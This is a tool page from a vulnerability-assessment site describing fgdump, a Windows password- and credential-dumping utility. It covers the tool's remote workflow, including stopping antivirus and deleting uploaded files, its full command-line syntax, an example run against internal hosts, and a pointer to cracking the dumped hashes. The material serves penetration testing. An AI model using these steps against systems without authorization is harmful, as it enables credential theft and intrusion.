The Web Local
 

 

 

Fgdump

 

Fgdump is basically a utility for dumping passwords on Windows NT/2000/XP/2003/Vista machines.  It has all the functionality of pwdump in-built and can also do a number of other neat things also like grabbing cached credentials, executing a remote executable and dump the protected storage on a remote, (or local), host. Users of pwdump are advised to upgrade to this as soon as possible.

 

Fgdump comes with a number of add-ons:

 

  • fgexec: remotely installed service that can run a remote executable. (This is a little limited)
  • pwdump6: An updated version of pwdump3e.
  • pstgdump: A protected storage dumper. (IE, Outlook Express passwords etc.).

 

In essence fgdump carries out the following when trying to grab passwords from the remote machine:

 

  • Bind to a remote machine/target list using IPC$,

  • Stop AV, if it is installed,

  • Locate file shares exposed on that machine,

  • Find a writable share from the above list, bind it to a local drive,

  • Upload fgexec, cachedump

  • Run pwdump, (password history dump included),

  • Run cachedump,

  • Run pstgdump,

  • Delete uploaded files from the file share,

  • Unbind the remote file share,

  • Restart AV if it was running,

  • Unbind from IPC$.

 

Note: - The current release may have issues if you have another copy of pwdump and lsaext.dll on, it is best to delete these file.  If older versions of the executable/dll are found fgdump may use them and possibly cause the target system/s to crash.

 

Installation:

 

Download the executable from here.

Extract the zip file, that's it.

 

Execution:

 

fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename}

 

Note: - Username and Password must have administrator credentials

 

   -t       Tests for the presence of antivirus without actually running the password dumps
   -c      Forces fgdump to skip the cache dump
   -w     Forces fgdump to skip the password dump
   -s      Forces fgdump to skip the protected storage dump
   -r      Fgdump forget about existing pwdump/cachedump files. Default - Skip a host if they already exist.
   -v     Verbose output. Use twice for greater effect
   -k     Keeps the pwdump/cachedump going even if antivirus is in an unknown state
   -l      Logs all output to logfile
   -T     Runs fgdump with the specified number of parallel threads
   -h     Name of the single host to perform the dumps against
   -f      Reads hosts from a line-separated file
  -H     Reads host:username:password from a line-separated file (per-host credentials)

 

Example Output:

 

C:\fgdump-1.5.2\Release>fgdump.exe -u hacker -p hard_password -c -f target.txt
 

fgDump 1.5.2 - fizzgig and the mighty group at foofus.net ****** Written to make j0m0kun's life just a bit easier
Copyright(C) 2006 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it under certain conditions; see the COPYING and README files for more information.

** Beginning dump on server 192.168.1.17 **
OS (192.168.1.17): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

** Beginning dump on server 192.168.1.18 **
OS (192.168.1.18): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

** Beginning dump on server 192.168.1.124 **
OS (192.168.1.124): Microsoft Windows 2000 Server Service Pack 4 (Build 2195)
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage

Failed servers:

Successful servers:
192.168.1.17
192.168.1.18
192.168.1.124

Total failed: 0
Total successful: 3

C:\fgdump-1.3.2-BETA\Release>dir

26/09/2006 15:20 230 192.168.1.124.cachedump
26/09/2006 15:20 514 192.168.1.124.pwdump
26/09/2006 15:37 605 192.168.1.17.pwdump
26/09/2006 15:37 697 192.168.1.18.pwdump
11/07/2006 15:16 569,344 fgdump.exe
26/09/2006 15:37 64 target.txt
 

The next step would be to import the pwdump file, (192.168.1.124.pwdump etc.), into a program like L0phtcrack and start your attack against the hashes:

 

 

IT Security News:

 

Pen Testing Framework:

 

Latest Tool Reviews:

 

 

 

  
 

© VulnerabilityAssessment.co.uk 25 February 2008